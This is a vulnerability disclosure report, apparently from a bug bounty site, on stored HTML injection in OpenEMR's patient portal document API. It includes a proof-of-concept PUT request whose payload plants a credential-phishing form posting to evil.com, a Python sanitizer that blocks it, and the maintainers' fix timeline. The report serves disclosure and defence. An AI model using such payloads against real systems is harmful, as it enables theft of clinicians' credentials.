Patient ability to rewrite its own documents leads to HTML injection in openemr/openemr

Valid

Reported on

Dec 26th 2022


Description

Through a PUT request to the patient portal's onsite document API, a Patient can rewrite their own document via the fullDocument JSON parameter. The server stores whatever HTML the client sends in that field, so a malicious patient can override the document template and replace it with their own content, injecting arbitrary HTML that the Doctor will see when the document is later opened on the clinician side.

Proof of Concept

  • Log in on http://demo.openemr.io/openemr/portal/home.php as a Patient
  • Go to the "My Documents" section and open, for example, "Insurance Info"
  • You will see a regular form. Change something in the form and click Save; this triggers a PUT request to the /openemr/portal/patient/api/onsitedocument/<ID> endpoint.
  • You will notice a fullDocument JSON parameter in the request body; its value can be changed freely.
  • Send a request like this:
PUT /openemr/portal/patient/api/onsitedocument/7 HTTP/1.1
Host: demo.openemr.io

{"id":"2","pid":"1","facility":"0","provider":"0","encounter":"0","createDate":"2022-12-26 04:18:41","docType":"Insurance Info","patientSignedStatus":"0","patientSignedTime":"0000-00-00 00:00:00","authorizeSignedTime":"0000-00-00 00:00:00","acceptSignedStatus":"0","authorizingSignator":"","reviewDate":"0000-00-00 00:00:00","denialReason":"In review","authorizedSignature":"","patientSignature":"","fullDocument":"<h3>please provide your username and password:</h3><br><form method='post' action='//evil.com/login.php'>username:<input type='text' name='username' /><br />password: <input type='password'  name='password'><br /><input type='submit' value='login' /></form><br /><a href=//evil.com>click here</a><!--","fileName":"Insurance Info","filePath":"5"}
  • I've injected a malicious form to gather credentials and a link that redirects to an evil site (so two malicious HTML payloads)
  • Now the document looks like this:

image

  • Now, to see the impact, go to the Doctor admin panel and retrieve the patient's documents.
  • To do that, go to Patient -> Search -> select the Patient -> Documents, and fetch the Insurance Info document from here:

image

You will see the exact same file on the Doctor's end.

Impact

With this vulnerability, a malicious Patient can rewrite an entire document form with malicious HTML content and have it rendered to the Doctor. Because the content is stored server-side and displayed inside the clinician's authenticated session, the injected form and link can be used to phish staff credentials or lead staff to an attacker-controlled site.
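The root cause is that the patient-supplied fullDocument value is persisted and rendered as-is. The following is an added example, not OpenEMR's own PHP code and not the fix in the referenced commit: it models the kind of allowlist check a server-side handler could apply to fullDocument before storing it, run against the exact payload from the PoC above. The allowlist, the policy of rejecting every non-site-relative href, and the function names are assumptions for illustration.

```python
"""Allowlist sanitizer for patient-supplied onsite document HTML.

Added example, not OpenEMR code. It models the server-side check that the
portal's onsitedocument PUT handler could apply to the fullDocument field
before persisting it. Function names, the allowlist and the href policy are
assumptions for illustration.
"""
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlparse

# Formatting a patient may legitimately use inside a document. No form
# controls, no scripts, no embedding elements (assumed allowlist).
ALLOWED_TAGS = {"b", "i", "u", "em", "strong", "p", "br", "h3", "h4",
                "ul", "ol", "li", "span", "div", "a"}
ALLOWED_ATTRS = {"a": {"href"}}
# Elements whose content must be dropped too, not just their tags.
DROP_CONTENT = {"script", "style", "iframe", "object", "embed"}
VOID_TAGS = {"br"}


def safe_href(url):
    """Accept only site-relative paths such as /portal/home.php.
    Absolute URLs, protocol-relative URLs (//evil.com) and javascript:
    links are rejected so a document cannot lead the doctor off-site."""
    url = url.strip()
    parts = urlparse(url)
    return (not parts.scheme and not parts.netloc
            and url.startswith("/") and not url.startswith("//"))


class _Sanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.skip_depth = 0        # > 0 while inside a DROP_CONTENT element
        self.dropped_tags = set()  # disallowed elements seen in the input
        self.rejected_urls = []    # href values that failed safe_href()

    def handle_starttag(self, tag, attrs):
        if self.skip_depth:
            if tag in DROP_CONTENT:
                self.skip_depth += 1
            return
        if tag in DROP_CONTENT:
            self.skip_depth = 1
            self.dropped_tags.add(tag)
            return
        if tag not in ALLOWED_TAGS:
            self.dropped_tags.add(tag)   # tag removed, its text is kept
            return
        kept = []
        for name, value in attrs:
            # Anything not allowlisted (onclick, style, action, ...) is dropped.
            if name not in ALLOWED_ATTRS.get(tag, set()) or value is None:
                continue
            if name == "href" and not safe_href(value):
                self.rejected_urls.append(value)
                continue
            kept.append(' %s="%s"' % (name, escape(value, quote=True)))
        self.out.append("<%s%s>" % (tag, "".join(kept)))

    def handle_startendtag(self, tag, attrs):
        # <br /> and friends: emit the start tag only, never a stray </br>.
        self.handle_starttag(tag, attrs)

    def handle_endtag(self, tag):
        if self.skip_depth:
            if tag in DROP_CONTENT:
                self.skip_depth -= 1
            return
        if tag in ALLOWED_TAGS and tag not in VOID_TAGS:
            self.out.append("</%s>" % tag)

    def handle_data(self, data):
        if not self.skip_depth:
            self.out.append(escape(data, quote=False))

    def handle_comment(self, data):
        # Comments are dropped; the PoC ends with "<!--" to hide the rest of
        # the original template from the viewer.
        pass


def sanitize_document(html):
    """Return (clean_html, dropped_tags, rejected_urls).

    A strict handler would refuse the PUT when dropped_tags or rejected_urls
    is non-empty instead of silently storing the cleaned version; both
    signals are returned so the caller can choose."""
    p = _Sanitizer()
    p.feed(html)
    p.close()
    return "".join(p.out), sorted(p.dropped_tags), p.rejected_urls


# The fullDocument value from the PoC request above.
POC_PAYLOAD = (
    "<h3>please provide your username and password:</h3><br>"
    "<form method='post' action='//evil.com/login.php'>"
    "username:<input type='text' name='username' /><br />"
    "password: <input type='password'  name='password'><br />"
    "<input type='submit' value='login' /></form><br />"
    "<a href=//evil.com>click here</a><!--"
)

if __name__ == "__main__":
    clean, dropped, bad_urls = sanitize_document(POC_PAYLOAD)
    print("dropped tags :", dropped)
    print("rejected urls:", bad_urls)
    print("stored as    :", clean)
```

Run against the PoC payload, the form and its three input elements are reported as dropped and the protocol-relative href is reported as rejected, so a handler that refuses the request on any finding would have blocked this report's payload outright. Sanitizing only fixes the injection; whether a patient should be able to replace a server-side document template at all is a separate authorization question the handler also has to answer.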

We are processing your report and will contact the openemr team within 24 hours. 9 months ago
We have contacted a member of the openemr team and are waiting to hear back 9 months ago
openemr/openemr maintainer has acknowledged this report 9 months ago
stephen waite validated this vulnerability 5 months ago

Hi @leorac, thanks for the report. A preliminary fix has been posted, https://github.com/openemr/openemr/commit/abee8d2606c706176818de25eb88a2d08b8f7fa4

Please do not create a CVE number or make this vulnerability public at this time. We will make this fix official about 1 week after we release 7.0.1, which will likely be in about 2-4 weeks. After we do that, it will be ok to create a CVE number and make it public.

leorac has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Brady Miller marked this as fixed in 7.0.1 with commit abee8d 4 months ago
The fix bounty has been dropped
This vulnerability has been assigned a CVE
Brady Miller published this vulnerability 4 months ago